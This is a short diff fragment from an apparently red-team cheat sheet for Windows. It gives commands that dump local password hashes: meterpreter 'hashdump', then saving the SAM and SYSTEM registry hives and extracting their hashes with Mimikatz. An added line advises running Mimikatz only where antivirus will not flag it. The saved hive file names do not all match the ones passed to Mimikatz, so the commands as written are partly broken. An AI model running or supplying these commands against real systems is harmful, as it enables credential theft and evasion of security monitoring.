lw8192/Red-Team-Rising/Windows/Readme.md

     meter > hashdump

 ### Dump Hives and Extract with Mimikatz
+AV products will flag on Mimikatz so only do this if you are sure if won't (otherwise crack the hashes locally).

     C:\Temp> reg save hklm\sam sam.hive && reg save hklm\system system.hiv
     C:\Temp> c:\tools\mimikatz\x64\mimikatz.exe "lsadump::sam /sam:sam.hiv /system:system.hiv" "exit"